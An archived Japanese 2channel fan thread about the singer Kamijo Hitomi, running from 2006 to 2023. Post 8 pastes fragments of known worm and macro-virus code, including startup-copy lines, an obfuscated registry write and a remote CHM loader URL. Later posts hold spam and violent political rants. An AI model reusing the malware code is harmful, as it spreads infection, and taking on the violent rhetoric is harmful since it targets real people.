2ちゃんねる ■掲示板に戻る■ 全部 1- 最新50    

■ このスレッドは過去ログ倉庫に格納されています

上條ひとみ1キセキ

1 :名無しの歌姫:2006/09/04(月) 05:07:32 ID:kx6gzXOk.net
上條ひとみちゃんについて何でも語りましょう!

2 :赤いキセキ:2006/09/04(月) 06:10:24 ID:kx6gzXOk.net
今ハダカの約束、BEAUTYで頑張ってる上條ひとみちゃん。スレがなかったので立てました。応援していきましょう!

3 :芸スポ板名物:2006/09/04(月) 06:23:49 ID:tS7Rs5Lc.net
誰?

4 :名無しの歌姫:2006/09/04(月) 06:24:33 ID:tS7Rs5Lc.net
誰?

5 :名無しの歌姫:2006/09/04(月) 06:25:14 ID:tS7Rs5Lc.net
だれ?

6 :名無しの歌姫:2006/09/04(月) 07:20:20 ID:kx6gzXOk.net
今バリバリバリューのエンディング歌ってる人。あと東海ラジオをキーステーション(STV、TBC、OBC、RCC、KBCにネット)に上條ひとみのキセキと言う番組やってるよ。

7 :赤いキセキ:2006/09/04(月) 07:23:58 ID:kx6gzXOk.net
あとCanCamやJJのモデルもやっていた。去年10月に「キセキ」で歌手デビューした。

8 :名無しの歌姫:2006/09/04(月) 07:24:31 ID:Jk6bl0i/.net
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

9 :名無しの歌姫:2006/09/08(金) 16:36:10 ID:hi9q5RrU.net



10 :名無しの歌姫:2006/09/08(金) 17:19:37 ID:mT6LQjy2.net
dare?

11 :名無しの歌姫:2006/09/08(金) 17:20:43 ID:mT6LQjy2.net
(・∀・)!!





で、だれ?

12 :名無しの歌姫:2006/09/08(金) 17:21:37 ID:mT6LQjy2.net
誰?

13 :名無しの歌姫:2006/09/08(金) 17:23:44 ID:mT6LQjy2.net
以上
芸スポ速報+名物「誰?」をおおくりしました。

14 :赤いキセキ:2006/09/09(土) 03:54:51 ID:f09/K9dQ.net
まだ知名度が薄かったら仕方ないかもね。テレビに写ることあまりないから知られていないのも無理はない。これから覚えてもらってほしい。俺も知らない歌手いっぱいいるから。ラジオで知ってひとみちゃんの歌が流れて好きになった。

15 :名無しの歌姫:2006/09/11(月) 01:46:16 ID:1SzTIITg.net
もうすぐ始まるよ

16 :名無しの歌姫:2006/09/15(金) 14:39:57 ID:2wNCBbTt.net



17 :名無しの歌姫:2006/09/23(土) 02:07:49 ID:SXhPlR45.net



18 :名無しの歌姫:2006/09/24(日) 03:57:32 ID:OLziZ23+.net
付き合った男はみんな左利きだったそうな

19 :名無しの歌姫:2006/09/24(日) 05:15:29 ID:Rob8zZDt.net
>>1
やっとスレが立ったか。
東海ラジオで初めて知って声に萌えたので気になってた。

20 :名無しの歌姫:2006/10/02(月) 21:00:06 ID:yokXChtb.net



21 :名無しの歌姫:2006/10/12(木) 03:14:22 ID:A2ESpfyB.net
age

22 :名無しの歌姫:2006/10/12(木) 21:31:28 ID:O359cuYq.net
age

23 :名無しの歌姫:2006/10/23(月) 02:15:53 ID:Wb0IMkHj.net
age

24 :名無しの歌姫:2006/10/23(月) 14:32:06 ID:1XUNuQJ2.net
いつも彼女がアシスタントしてる某ラジオ番組聴くけど
Beautyという曲の恐ろしいまでの音数の少なさと
80’sでもベタって言われるだろう曲&アレンジにびっくりさせられる。

25 :名無しの歌姫:2006/10/24(火) 18:59:04 ID:3B2iJP8T.net
>>24
イベントでのカラオケ大会みたいな雰囲気で聴くのはいいが
CDでとなるとひどいよな

26 :名無しの歌姫:2006/11/09(木) 10:46:41 ID:2+is5BW1.net
かわいいね。

27 :名無しの歌姫:2006/11/14(火) 06:33:20 ID:CIv32eI0.net
ちょっとね。

28 :名無しの歌姫:2006/12/15(金) 15:01:26 ID:1LONzDc0.net
ノロウィルスでダウンしたらしいw

29 :名無しの歌姫:2006/12/28(木) 01:49:50 ID:m81Pn0sd.net
21日の重大発表ってなんだったのか
ご存知の方いませんか?

30 :赤いキセキ:2007/01/13(土) 07:00:46 ID:Lt913/Gp.net
2月21日に新曲(メモリー)をリリースする。ラジオでアピールしている。

31 :名無しの歌姫:2007/02/05(月) 08:11:55 ID:9VP1ybrT.net
くく

32 :名無しの歌姫:2007/03/04(日) 19:38:35 ID:MCfHuDrR.net
だれ?

33 :名無しの歌姫:2007/03/04(日) 23:14:37 ID:4mg4b+DO.net
カワイイのにチープな曲(特にアレンジ)で・・・もったいない

34 :名無しの歌姫:2007/03/10(土) 22:06:11 ID:4Jj3ltjJ.net
よくこういうとこにいる、アレンジどうこうって言う人って、職業アレンジャーなのかなぁ。
おいらよくわからんけど、批評家って(なんかニートの批評みたいで)嫌い。

35 :名無しの歌姫:2007/03/17(土) 18:25:43 ID:mcpGda6z.net
新潟のテレビ番組に生出演中

36 :名無しの歌姫:2007/03/17(土) 18:35:11 ID:NurHomm8.net
新潟一番みた。食堂で飯食ってるときに流れていた。トランスが好きな俺にはちょっと良かった

37 :名無しの歌姫:2007/03/17(土) 18:37:44 ID:OHYeankX.net
キセキはよかったけど、個人的にどんどん好きじゃない方向性にむかってる

38 :名無しの歌姫:2007/03/20(火) 21:39:04 ID:hrR+L9Mt.net
倖田來未の時みたいな波を感じる 知ってる奴しか知らんがな

39 :名無しの歌姫:2007/03/26(月) 19:36:30 ID:ZPZR35Rb.net
こいつの番組聞いたことあるけど歌が下手な上に楽曲もクソ過ぎた

40 :名無しの歌姫:2007/04/04(水) 21:01:58 ID:pJlabkUX.net
age

41 :名無しの歌姫:2007/05/06(日) 01:47:56 ID:pkx+mWHi0.net
この人なんか一方的に話を進めていくよね…それも変なテンションで。

42 :名無しの歌姫:2007/05/14(月) 07:56:27 ID:ac5T/G2DO.net
かわいいじゃないか

43 :名無しの歌姫:2007/06/01(金) 03:18:01 ID:gyNk31+E0.net
ルックスはいいのに・・

44 :名無しの歌姫:2007/06/18(月) 02:33:21 ID:tIggCNcLO.net
6月いっぱいでキセキ(ラジオ番組)終了だって。しかも最終回でもないのに泣いてるし

45 :名無しの歌姫:2007/06/18(月) 07:25:15 ID:yyii+Tpv0.net
本人的に言えば不完全燃焼と思う。3月いっぱいでネット局が減り、わずか3ヵ月で放送終了になると思わなかった。

46 :名無しの歌姫:2007/06/20(水) 01:02:22 ID:iC2yFypG0.net
ひとみちゃんの泣き声、聞き逃した・・・・

47 :名無しの歌姫:2007/06/23(土) 17:17:03 ID:KmAuuXaT0.net
この人はもっと売れてもいい ルックスもいいし
性格も良さそうだし(ラジオ聴くかぎりでは)
何かが足りないのか

48 :名無しの歌姫:2007/07/10(火) 17:23:30 ID:ZNej3mmx0.net
がんばれ

49 :名無しの歌姫:2007/07/11(水) 00:11:38 ID:MkY5rZSY0.net
知名度が少ない 
キセキという曲は良かったのに最近のはイマイチかな

今後に期待 がんばれ ひとみちゃん

50 :名無しの歌姫:2007/07/11(水) 10:02:00 ID:qZsbshQPO.net
スレ立ったの去年の9月ですかそうですか。
まだレス50?
いいキャラしてんだからもっと応援してやれ〜

51 :名無しの歌姫:2007/07/23(月) 23:56:45 ID:Lcaylkgw0.net
脱いでほしい

52 :名無しの歌姫:2007/08/09(木) 07:49:21 ID:Ww0PGR2c0.net
応援するよ。NACK5で番組持ってるみたいだけどがんばってるのかな?キセキ終わってからひとみちゃんの生声聞いてない。

53 :名無しの歌姫:2007/09/01(土) 20:00:33 ID:P8rnzvZw0.net


54 :名無しの歌姫:2007/09/01(土) 20:24:25 ID:Wpbpm+zv0.net
>>52
NACK5のHPのhithit.comでストリーミング配信見れるよ
明日もあると思うよ ゲスト登場時間以外ほとんどアップ映像だよ

55 :名無しの歌姫:2007/09/03(月) 01:28:45 ID:EH/4wrVFO.net
6月の札幌ライブのが終わったあとにサイン頼んだら気軽にOKしてくれたよ。上條さんありがとう!そろそろ新曲だして〜!!

56 :名無しの歌姫:2007/09/10(月) 04:12:34 ID:n45xLTmf0.net


57 :名無しの歌姫:2007/09/28(金) 23:33:27 ID:6me4mHdF0.net
知ってるとは思うがACCESS TO YOU 卒業らしいぞ

58 :名無しの歌姫:2007/10/12(金) 15:34:33 ID:d/RIMFh0O.net
中古CD屋さんでジャケットがかわいいので全く知らない人だったんですが(すみません…)、なんとはなしに「キ・セ・キ」というCDを買ってみました。
聴いてびっくり、ドンピシャの好みの曲でした。Octoberが特にすきです。
上條さんのこの路線のCDって他に出ていますか?

59 :名無しの歌姫:2007/11/14(水) 20:49:16 ID:rcmzcGeV0.net
今現在何にも活動していないのかな?
NACK5もキ・セ・キも終了したよね。

彼女のブログとかあったらわかるんだけど・・・
名前変えてインディーズに行ったのかな?

60 :名無しの歌姫:2007/11/15(木) 15:32:59 ID:VIPSwYXi0.net
http://204.3.204.91/cgi-local/bbs05/news.cgi

10月15日まで書いてた

61 :名無しの歌姫:2007/11/24(土) 01:02:03 ID:8FxlS7spO.net
所属事務所(アイント)を辞めたみたいですよ。だからアイント直属の公式HPは閉鎖したみたい。でもU-CANには残っているようだから.今後何かしらの音楽活動はあるかも知れません。

62 :名無しの歌姫:2007/11/24(土) 01:49:10 ID:MlDd+7k40.net
歌も上手いしキレイな人だったけどこのままフェイドアウトかな

ショービジネスは難しいね 

63 :62:2007/11/24(土) 01:54:51 ID:MlDd+7k40.net
いやキツイ事を書いたけどCDも買ってたしイベントも行ったしラジオも聴いてたけどさ・・・
性格良さそうなキャラクターで大好きなんだけどさ 作詞の才能もあるし

また頑張って欲しいと希望します

64 :名無しの歌姫:2007/12/06(木) 13:24:32 ID:YLw3wkQlO.net
「Green」届きました。
元気いっぱいな感じよりも私はOctoberタイプの曲がいいなぁ…、ごめんね(´・ω・`)
でも応援しているよ。

65 :名無しの歌姫:2007/12/06(木) 22:35:58 ID:gxRFnrdA0.net
最初、モデルだから気取った人かと思ってたら全然違って見た目とイメージ違うなと思った
全国区のテレビに出たら人気出ると思うよ

66 :名無しの歌姫:2007/12/06(木) 23:34:18 ID:0zTdoWE2O.net
2月あたりに新曲をだしてくれないかなぁ…

67 :名無しの歌姫:2007/12/24(月) 21:19:24 ID:tr64s4fAO.net
保守。フェードアウトしてはいかん。頑張って!!

68 :名無しの歌姫:2007/12/25(火) 13:46:27 ID:IjxgaUmd0.net
この人は結構お金持ちのお嬢さんだから無理して芸能界にしがみつく必要は無いだろう

69 :名無しの歌姫:2008/01/28(月) 01:33:44 ID:0NheaBGjO.net
完全にこのスレも止まってしまったか…

70 :名無しの歌姫:2008/02/07(木) 23:51:00 ID:iJsBcnYN0.net
>>69
無理も無い、だって本人が活動しない限り話の内容は尽きるもんな




71 :名無しの歌姫:2008/02/13(水) 14:36:09 ID:+v1waIooO.net
保守

72 :名無しの歌姫:2008/02/23(土) 00:48:55 ID:kLHxp3O3O.net
保守一徹

73 :名無しの歌姫:2008/03/31(月) 01:36:11 ID:S02ASOwhO.net
改変で出てこないかしら。もう忘れられちゃったかしら。

74 :名無しの歌姫:2008/04/03(木) 18:32:30 ID:aPwiekbB0.net
倖田なんかよりもずっとキレイで性格も良さそうだったのに生き残れなかったか・・・
もったいない

75 :名無しの歌姫:2008/04/04(金) 08:55:38 ID:K32goLxTO.net
このお方はお金持ちの家の人なんですか?

76 :名無しの歌姫:2008/04/07(月) 18:48:32 ID:EELQ/7LR0.net
金持ちかどうか知らんが実家の地下室はピアノ置いてあったりして、ひとみちゃんの音楽ルームになってる。

77 :名無しの歌姫:2008/04/13(日) 19:08:30 ID:7gEsSYCh0.net
>>76詳しいなww
ところでちょっと前の志穂ちゃんのBlogに載ってる仲間との写真ってやつ、
手前に見えるのは、まさかそんなことないよな?ww
目を凝らしたらさらに奥の方に写ってる人もそう見えてきたんだがorz

78 :名無しの歌姫:2008/04/15(火) 20:06:09 ID:PpgILqR5O.net
それ見ましたわ。あんな顔だったっけ?

79 :名無しの歌姫:2008/04/28(月) 18:09:45 ID:7/itOcIf0.net
どうしてU-CANのページはまだ残ってるんだろう
期待してしまってしょうがない

80 :名無しの歌姫:2008/05/05(月) 20:33:23 ID:5grwlWIyO.net
今年で27でしたかね?CDだすならラストチャンスですよ。

81 :名無しの歌姫:2008/06/14(土) 20:45:36 ID:3gT6hy2zO.net
あっ!去年の今日は上條ひとみにサインをもらった日じゃないですか。

82 :名無しの歌姫:2008/06/18(水) 02:39:18 ID:7q6v9JA00.net
もしかして上條さんも結婚したかな

83 :名無しの歌姫:2008/07/05(土) 16:04:03 ID:+lsY8q2j0.net
スレ隊に1って使うとスレ伸びないジンクス

84 :名無しの歌姫:2008/07/05(土) 18:31:16 ID:aSGhAVkyO.net
デモ

85 :名無しの歌姫:2008/07/07(月) 17:51:55 ID:8R4lj6bpO.net
100まで頑張ろう!!

86 :名無しの歌姫:2008/08/20(水) 16:49:48 ID:niK5dRW20.net
保守

87 :名無しの歌姫:2008/08/23(土) 05:15:05 ID:WpOykRZH0.net
100まで頑張ろう!!

88 :名無しの歌姫:2008/09/07(日) 19:56:44 ID:HYeJV+gkO.net
mon cheriのRIOという名で活動してるらしいですよ。NACK5のリスナーのブログに書いてあった。誰か詳しい情報をお願い致します。

89 :名無しの歌姫:2008/09/07(日) 23:13:55 ID:Xd19hIGD0.net
全然情報がつかめないorz
>>88さんが言ってるリスナーさんによるとサイトもあるようだけどねぇ

90 :名無しの歌姫:2008/09/08(月) 07:21:57 ID:p5N5VhRLO.net
http://www.moncheri-online.com/html_index.html あの後必死で探しましたよ。あったあった。

91 :名無しの歌姫:2008/09/23(火) 16:00:53 ID:oQaDPNuL0.net
スレがたってから早2年


92 :名無しの歌姫:2008/10/12(日) 18:37:43 ID:pOyVd/h60.net
>>90のサイト全く更新されないな
普通にOLの傍らこの活動してんのかな?
それともちゃんと事務所とかとは契約できてんのかな

93 :名無しの歌姫:2008/11/28(金) 21:36:51 ID:KGJIuNhk0.net
消えたーorz

94 :名無しの歌姫:2008/12/27(土) 22:45:26 ID:tIUw+WviO.net
「上條ひとみのキセキ」録音していたのが出て来たのですが需要ありますか?

95 :名無しの歌姫:2008/12/30(火) 14:23:31 ID:vIRUXdRc0.net
>>94
大遅刻で申し訳ないですが、ぜひお願いします。
歌声はともかく、今となってはフツーのおしゃべりがきける機会がなさそうなので。

96 :名無しの歌姫:2009/01/09(金) 18:42:58 ID:KVkb/PWD0.net
07.06.18 質は勘弁してください メル欄を見て
ttp://s-io.dyndns.tv/up/1/_/jump/1231493685.zip/attatch


97 :名無しの歌姫:2009/01/09(金) 21:17:22 ID:fJed7q5b0.net
>>96
IDが不正です
…と表示されてDL出来ないよー

98 :名無しの歌姫:2009/02/04(水) 12:02:51 ID:gXxH8jY+0.net
グリーンのパクリばっかで早く引退して下さい

99 :名無しの歌姫:2009/02/06(金) 17:44:34 ID:haeR21mYO.net


100 :名無しの歌姫:2009/02/27(金) 03:39:17 ID:pwOGeoK5O.net
100

101 :名無しの歌姫:2009/03/03(火) 01:19:20 ID:FYm1iuaeO.net
101

102 :名無しの歌姫:2009/04/27(月) 01:22:40 ID:/z/8p1RN0.net
102


103 :名無しの歌姫:2009/07/13(月) 00:18:41 ID:lYrwbUwC0.net
memory良曲すぐるwww

104 :名無しの歌姫:2009/07/16(木) 00:28:29 ID:7faDYrVO0.net
ttp://s-io.dyndns.tv/up/1/_/jump/1247671608.lzh/attatch


105 :名無しの歌姫:2009/09/16(水) 23:28:34 ID:R6GTLa9G0.net
age

106 :名無しの歌姫:2009/11/22(日) 17:17:30 ID:LJ726YmAQ.net
保守

107 :名無しの歌姫:2009/12/10(木) 06:48:35 ID:oxuitx3uO.net
オリックスの小松選手と結婚らしいです
http://www.sponichi.co.jp/osaka/spe1/orix.html
年齢が同じでタレントらしいのでおそらく同一人物かと

108 :名無しの歌姫:2009/12/12(土) 05:56:30 ID:xYxLG7Rk0.net
>>107
記事の見出しが“元タレント”になってるから、もう活動してないんですね。
せめて>>104さんの録音を名残りとしましょうか…お幸せに。

109 :名無しの歌姫:2009/12/25(金) 15:17:11 ID:NY9QISlV0.net
お疲れ様でした!このスレもエンディングです!
あめでとう!さようなら!

110 :名無しの歌姫:2010/05/02(日) 10:50:17 ID:8FDNGEOJ0.net
あらま

111 :名無しの歌姫:2010/05/02(日) 14:12:31 ID:23sVsIew0.net
さよなら

112 :名無しの歌姫:2010/05/03(月) 10:57:43 ID:/gqXKODo0.net


113 :名無しの歌姫:2011/03/03(木) 11:27:18.56 ID:iRJPcjgm0.net


114 : 忍法帖【Lv=9,xxxP】 :2011/03/27(日) 09:36:11.14 ID:9tFe97us0.net
てs

115 : 忍法帖【Lv=10,xxxPT】 :2011/03/27(日) 09:44:02.93 ID:9tFe97us0.net
もう一回テス すまない。

116 : 忍法帖【Lv=40,xxxPT】 :2011/05/25(水) 23:53:43.09 ID:jcLIGtdp0.net
テスト保守

117 : 忍法帖【Lv=3,xxxP】 :2011/05/29(日) 10:20:05.94 ID:8tgjjJe30.net
「!ninja

118 : 忍法帖【Lv=1,xxxP】 :2011/05/29(日) 12:32:03.06 ID:IA8c/kkX0.net
test

119 : 忍法帖【Lv=3,xxxP】 :2011/06/11(土) 01:18:07.66 ID:MzqTE1T4O.net
保守

120 :名無しの歌姫:2011/07/22(金) 00:39:35.25 ID:8VVX8g/b0.net
120

121 :名無しの歌姫:2013/04/28(日) 09:55:41.04 ID:h6lOn2Up0.net
121キセキ

122 :名無し:2013/05/05(日) 10:03:53.35 ID:46WNBUko0.net
138 :名無しの歌が聞こえてくるよ♪:2008/01/03(木) 10:30:52 ID:???
            ____
         |    | 
         | 大 |  
         | 塚 |  
         | 愛 |
      ,,,.   |    |  ,'"';,
    、''゙゙;、).  |    | 、''゙゙;、),、             /二二ヽ
     ゙''!リ'' i二二二二!゙''l!リ'''゙               |     |
     ‖  `i二二二!´ ‖               |  大.. |
     昌 |: ̄ ̄ ̄ ̄:| 昌                 |  塚 |
    | ̄:|_|;;;l"二二゙゙l;;|_| ̄:|               |  愛 |
    |  :|::::::| |;;;;;;;;;;| |::::|  :|              |     |
    |  :|::::::|┌─┐|::::|  :|            __|    |__
 ./゙゙└‐┴ ┴l,,,,,,,,,,l┴┴‐┘゙゙゙゙\        / └──┘ \
 | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|       |´ ̄ ̄ ̄ ̄ ̄ ̄| ソ         ---、__
  ̄|三|三三|三三三三|三三|三| ̄      ソ::::::::::::::::::::::::::::::::ソソ        /´   冫:ヽ
   |  |:::  |: :    : : |::   |  |        / ソ ̄|;;;;;;;lll;;;;;;;| ̄ソ \       |  大 ;:.:.:.l 
   |  |:::  |: :    : : |::   |  |       .|´ ̄ ̄ |. [廿] .|´ ̄ ̄.|        |   塚 :.:.:.:| 
  /_|:::  |: :     : :.|::  :|_ヽ     |:::::::::::::::|      |::::::::::::::|         |   愛. :.:.:.:l
 _|___|;;;;;;;;;;|,;,;,,,,,,,,,,,,,,,;,;,|;;;;;;;;;;|___|_     |:::::::::::::::| ̄ ̄ ̄|::::::::::::::|      ...,!、,、,,, .:.::.::.:.l...... 
 l;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;l 

123 :名無しの歌姫:2014/02/28(金) 10:29:22.36 ID:7Ubo14Yw0.net
過疎

124 :名無しの歌姫:2014/06/23(月) 01:25:28.87 ID:vCOlP4pB0.net
てす

125 :名無しの歌姫:2014/11/09(日) 16:58:06.46 ID:IXDn+zo60.net
あげ

126 :名無しの歌姫:2015/02/28(土) 12:44:48.85 ID:CVzRO1hA0.net
保守

127 :名無しの歌姫:2015/07/28(火) 13:24:18.76 ID:92oEs4kr0.net
誰だよ

128 :名無しの歌姫:2016/01/05(火) 12:48:25.67 ID:BPMAyrP30.net


129 :名無しの歌姫:2016/02/14(日) 18:30:24.56 ID:uT6BVV+k0.net
ありさんマークは「みなし時間外労働賃金」という【残業代カットの違法企業】

130 :名無しの歌姫:2016/10/29(土) 10:51:16.07 ID:WCK+0sAu0.net
保守

131 :名無しの歌姫:2017/09/17(日) 17:50:50.56 ID:HeIB9qgN0.net
a

132 :名無しの歌姫:2018/01/03(水) 01:14:30.17 ID:YXYlq2Lv0.net
邦楽もおもしろいけど、小遣い稼ぎの方法とか

グーグル検索⇒『増田のセンジョイウツツノ』

ER4YLPKIEZ

133 :名無しの歌姫:2018/07/06(金) 03:34:00.37 ID:qJ8PDg2A0.net
すごくおもしろい嘘みたいに金の生る木を作れる方法
興味がある人はどうぞ
検索してみよう『ネットで稼ぐ方法 モニアレフヌノ』

QX8

134 :名無しの歌姫:2018/07/23(月) 16:44:47.97 ID:CsKhevCG0.net
誰でもできる稼ぐことができるホームページ
念のためにのせておきます
2chまとめで副業できる方法とは?さりげなく検索しちゃおう『立木のボボトイテテレ』

Q6P

135 :名無しの歌姫:2019/12/22(日) 19:19:42.12 ID:PPxTZNK50.net
Q6P

136 :名無しの歌姫:2020/01/28(火) 16:04:34.90 ID:JGWu3an50.net
話題がない

137 :名無しの歌姫:2020/12/02(水) 19:34:50.10 ID:+5EYAl/R0.net
ciy

138 :名無しの歌姫:2020/12/03(木) 14:58:22.34 ID:zNur5mFt0.net
JIQ

139 :名無しの歌姫:2023/07/07(金) 03:11:32.32 ID:+i1F9gM0W
公務員というテロリス├税金泥棒とその癒着害虫の贅沢三昧な生活を支えるために
お前らは地球破壞して災害連発させてまて゛日夜無駄に必死に無様に働かされてるのが現実な
要するに,公務員を根絶やしにするたったそれだけの簡単なことて゛.JАLだの機長殴って駆け付けた警官まで殴打して現行犯逮捕の
洒気帯ひ゛運転АΝАた゛のクソアヰヌト゛ゥだの酒飲んて゛業務してるクサイマ−クだのゴキフ゛リフラヰヤーだのテ□リス├による
温室効果カ゛スまき散らし気侯変動、土砂崩れ.洪水、暴風,猛暑、大雪にと住民の生命と財産か゛破壊される強盗殺人テ□は激減するし,
コ□ナまき散らされて医療崩壊されて白々しいナノマシン入りワクチンもと゛き打ち込まれて数々の副作用て゛殺されることもなくなるし、
騷音によって知的産業か゛根絶やしにされてシステ厶障害まみれのポンコツ後進國からすら脱却て゛きるわけだか゛、最低でも
税金泥棒公務員と資本家階級の贅沢Ξ昧な生活を支える行為を放棄する『働いたら負け」は正義た゛という正しい理解をしないとな

創価学会員は.何百万人も殺傷して損害を与えて私腹を肥やし続けて逮捕者まて゛出てる世界最惡の殺人腐敗組織公明党を
池田センセーか゛□をきけて容認するとか本氣で思ってるとしたら侮辱にもほどか゛あるそ゛!
https://i.imgur.com/hnli1ga.jpeg

140 :名無しの歌姫:2023/09/28(木) 00:10:38.92 ID:PCJkya5b2
人権侵害の事例でコ‐ヒーだのアパレル生産だのほさ゛いてる野球(笑)少年た゛った西村康稔って、やっぱり根本的にロクでもないクズだよな
莫大な石油無駄に燃やして莫大な温室効果カ゛スまき散らして気候変動させて日本と゛ころか世界中で災害連発させて住民殺害しまくってる上に
公然と憲法ガン無視で住宅地侵略して騒音まき散らして私権侵害を繰り返す史上最悪の人権侵害と゛ころか強盗殺人によって儲けてる大量破壊
兵器であるクソ航空機飛ばしまくっていながら何寝ぼけたことほざいてやがんだか、このように公明党国土破壊省の強盗殺人の首魁斉藤鉄夫
主導で強盜殺人流行らせてるせいで同じくスポーツ少年だった儿フィらも俺も俺もと強盗殺人多発させて、今度は強盗殺人犯の巣窟クソ羽田
にJR接続して強盗殺人に加担しようって深澤祐二のクズっぷりにもドン引きだな.クソ航空テ口リストとベッタリ静岡県知事にリニア妨害
されたり、地方ではクソ空港のせいで乗客激減路線存続危機しかも気候変動災害連發くらっていながら脱炭素主張して叩くどころか加担とか
温室効果ガスによる海面上昇で猛威化した津波でクソ羽田もろともこの恥知らずどもを海の藻屑にしてやれよ
(羽田)ttps://www.call4.jp/info.рhp?type=iтems&id=I0000062 , ttps://haneda-Project.jimdofree.com/
(成田)ttPs://n-souonhigaisosyoudan.amebaownd.com/
(テロ組織)Ttps://i.imgur.Сom/hnli1ga.jpeg

総レス数 140
23 KB
掲示板に戻る 全部 前100 次100 最新50
read.cgi ver.24052200